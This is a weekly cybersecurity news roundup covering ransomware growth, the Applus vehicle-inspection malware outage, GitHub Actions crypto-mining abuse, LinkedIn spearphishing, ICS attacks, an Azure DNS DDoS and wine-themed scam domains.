Cyber Security Headlines – Week in Review is live every Thursday at 4pm PT/7pm ET. Join us each week by registering for the open discussion.
Ransomware 2.0 is here
The availability of ransomware-as-a-service is allowing more cybercriminals to become involved in the business, which now includes double extortion, which, according to analysis from F-Secure, has increased drastically in 2020. This has led to an increase in ransomware families, including Ragnar Locker, Doppelpaymer, Clop, Conti, and ChaCha. Key finding in the report include attackers are using Excel formulas, which cannot be blocked, to hide malicious code, Outlook, FaceBook and Office 365 were the most popular brands spoofed in phishing emails, three-quarters of domains used to host phishing pages were web hosting services, and email accounted for over half of all malware infection attempts in 2020, making it the most common method of spreading malware in ransomware attacks.
Malware attack is preventing car inspections in eight US states
The attack, which occurred last Tuesday, March 30 on emissions testing company Applus Technologies, disconnected its IT systems, preventing vehicle inspections in eight states, including Connecticut, Georgia, Idaho, Illinois, Massachusetts, Utah, and Wisconsin. Applus Technologies cannot provide a time frame for when they will restore service as State governments require them to go through a rigorous mitigation and testing process, which may have a cascade effect with DMV inspections, which may further lead to citations for lapsed inspections.
GitHub investigating crypto mining abuses
GitHub is actively investigating a series of attacks against its cloud infrastructure that allowed cybercriminals to implant and abuse the company’s servers for illicit crypto-mining operations. The attacks, which have been going on since the fall of 2020 abused a feature called GitHub Actions, which allows users to automatically execute tasks and workflows once a certain event happens inside one of their GitHub repositories. The attack involves forking a legitimate repository, adding malicious GitHub Actions to the original code, and then filing a Pull Request with the original repository in order to merge the code back into the original, without needing approval of the original project owner.
Firmware malware on the rise
According to Microsoft’s March 2021 Security Signals report, over 80% of enterprises were victims of at least one firmware attack in the past two years. The survey had responses from 1,000 companies from China, Germany, Japan, the U.K. and the U.S., who reported the majority of security investments were going to security updates, vulnerability scanning and advanced threat protection solutions. The report notes that NIST’s National Vulnerability Database has seen a five-fold increase in firmware attacks in the last four years. The report found that only 36% of businesses invest in hardware-based memory encryption, 46% are investing in hardware-based kernel protections,while 21% of decision-makers said they were not able to monitor firmware at all. (Security Affairs)
Thanks to our episode sponsor, Sotero
LinkedIn spearphishing campaign uses custom decoy job offers
A new spear-phishing campaign is targeting LinkedIn members with customized job offers in order to deliver a sophisticated backdoor trojan called “more_eggs.” The phish generates malicious ZIP archive files that mimic the name of the victims’ job titles taken from their LinkedIn profiles. If a LinkedIn member’s job is listed as Senior Account Executive—International Freight the malicious zip file would be titled Senior Account Executive—International Freight position. Upon opening the fake job offer, the victim unwittingly initiates the stealthy installation of the more_eggs trojan. With the COVID pandemic contributing to job losses, this phish takes advantage of job seekers who are desperate to find employment.
Ransomware attacks increased by 485% in 2020 over 2019
This data comes from Bitdefender’s 2020 Consumer Threat Landscape Report. Among the highlights: Two-thirds of the ransomware attacks took place in the first two quarters of 2020. Proprietary operating systems used in IoT devices made up 96% of all detected vulnerabilities, while a 335% surge in Smart TV vulnerabilities occurred compared to 2019. In social engineering, Android was especially heavily targeted, experiencing a 32% growth, specifically in impersonating video conferencing software and COVID-related medical apps. In addition, a 189% year-on-year increase in vulnerabilities in network-attached storage (NAS) devices was observed.
Industrial Control Systems are becoming a favorite target for threat actors
A new report from Kaspersky confirms that 33.4% of Industrial Control System (ICS) computers worldwide were hit by a cyberattack in the second half of 2020. Citing two of the more famous examples, the China-linked group RedEcho targeting the Indian power sector and an unidentified cybercriminal attempting to poison a Florida city’s water supply and treatment plant, the report states that the attacks have not just evolved but have become a “life-threatening” affair and are on an upswing, with the U.S., Canada, and Saudi Arabia experiencing the largest increases.
Microsoft reveals last week’s two-hour Azure outage was caused by DNS DDOS
Following up on a story we brought you on Monday, Microsoft has confirmed its April 1 outage was due to an anomalous surge of DNS queries from all over the world that was targeting certain domains hosted on Azure. The outage prevented users from accessing or signing into numerous Microsoft services. Microsoft did not reveal who was responsible for the attack whose success was unusual for such a large and well-defended target as Azure, but stated, “In this incident, one specific sequence of events exposed a code defect in our DNS service that reduced the efficiency of our DNS Edge caches.”
Slack and Discord file sharing used to spread malware
This finding comes from Cisco Talos research, finding this an increasingly common attack vector. Threat actors upload malicious files to the platforms, which are then housed in their CDN and linked for access. These links are then shared on other outside platforms, with the malware served up by Discord or Slack infrastructure. The researchers warned that using legitimate infrastructure generally trusted by other users makes social engineering attacks much easier to pull off. Talos previously identified attackers using Discord to distribute Thanatos ransomware in 2018. -also Google forms for phishing
Lockdowns saw the rise of wine scammers
A new report by Recorded Future notes that the start of COVID-19 lockdowns saw a rise in wine-related domain registrations as people increasingly turned to virtual happy hours to keep in contact with friends and co-workers, up 2-3 times pre-pandemic levels from April 2020 and continuing through March 2021. The report found malicious domains followed a similar growth, delayed a month with a large spike in May 2020, with a total of 4,389 malicious wine-themed domains identified. Malicious wine-related domains as a percentage of all wine domains registered peaked in June 2020 at 7%.